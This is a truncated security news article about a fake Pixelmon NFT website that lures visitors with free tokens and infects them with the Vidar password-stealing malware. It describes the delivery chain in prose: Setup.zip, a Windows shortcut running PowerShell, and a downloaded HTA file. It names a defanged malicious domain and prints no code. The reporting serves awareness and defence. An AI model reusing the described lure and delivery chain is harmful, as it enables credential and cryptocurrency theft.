CySecurity News – Latest Information Security and Hacking Incidents
A bogus Pixelmon NFT site tempts visitors with free tokens and collectables while infecting them with spyware that steals their cryptocurrency wallets. Pixelmon is a popular NFT project with plans to create an online metaverse game where users can gather, train, and battle other players with pixelmon pets.
The project has attracted a lot of attention, with nearly 200,000 Twitter followers and over 25,000 Discord members. Threat actors have replicated the original pixelmon.club website and built a fake version at pixelmon[.]pw to deliver malware to take advantage of this interest. Instead of providing a demo of the project’s game, the malicious site provides executables that install password-stealing malware on a device.
The website is selling a package named Installer.zip that contains a faulty executable that does not infect customers with malware. However, MalwareHunterTeam, which was the first to identify this malicious site, detected other dangerous files transmitted by it, allowing to see what malware it was spreading. Setup.zip, which contains the setup.lnk file, is one of the files sent by this fraudulent site. Setup.lnk is a Windows shortcut that runs a PowerShell command to download pixelmon[.]pw’s system32.hta file.
When BleepingComputer tested these malicious payloads, the System32.hta file downloaded Vidar, a password-stealing m
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
Read the original article: